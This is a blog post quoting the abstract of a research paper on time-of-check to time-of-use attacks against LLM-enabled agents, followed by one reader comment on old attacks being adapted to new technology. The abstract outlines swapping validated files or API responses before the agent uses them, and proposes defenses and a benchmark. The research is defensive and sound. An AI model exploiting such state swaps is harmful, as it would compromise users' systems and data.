Time-of-Check Time-of-Use Attacks Against LLMs
This is a nice piece of research: “Mind the Gap: Time-of-Check to Time-of-Use Vulnerabilities in LLM-Enabled Agents“.:
Abstract: Large Language Model (LLM)-enabled agents are rapidly emerging across a wide range of applications, but their deployment introduces vulnerabilities with security implications. While prior work has examined prompt-based attacks (e.g., prompt injection) and data-oriented threats (e.g., data exfiltration), time-of-check to time-of-use (TOCTOU) remain largely unexplored in this context. TOCTOU arises when an agent validates external state (e.g., a file or API response) that is later modified before use, enabling practical attacks such as malicious configuration swaps or payload injection. In this work, we present the first study of TOCTOU vulnerabilities in LLM-enabled agents. We introduce TOCTOU-Bench, a benchmark with 66 realistic user tasks designed to evaluate this class of vulnerabilities. As countermeasures, we adapt detection and mitigation techniques from systems security to this setting and propose prompt rewriting, state integrity monitoring, and tool-fusing. Our study highlights challenges unique to agentic workflows, where we achieve up to 25% detection accuracy using automated detection methods, a 3% decrease in vulnerable plan generation, and a 95% reduction in the attack window. When combining all three approaches, we reduce the TOCTOU vulnerabilities from an executed trajectory from 12% to 8%. Our findings open a new research direction at the intersection of AI safety and systems security.
Subscribe to comments on this entry
Clive Robinson • September 18, 2025 8:37 AM
@ Bruce, ALL,
“A new bottle for sour old wine”
We should not be surprised that this,
“Old method is being used against new technology.”
It happens with every new technology, the first people to subvert it are what we would or do call criminals depending on how fast the legislation etc moves in that jurisdiction.
More often than not the chosen method of subversion is an,
“Old tried, tested and true”
one, that’s just,
“Whittled to fit and dropped into the waiting new technology.”
So we should all expect to see similar to come.
Eventually there will be new “technology specific” subversions that come along. But generally not immediately because they need two things that old subversions don’t,
1, To be “invented” as a method.
2, Then be subject to “innovation”.
But don’t worry they will be along, I’ve had more than enough “invention” in my time illicit and not to be able to see so much in not just Current AI LLM’s but ML as well. And if I can see it…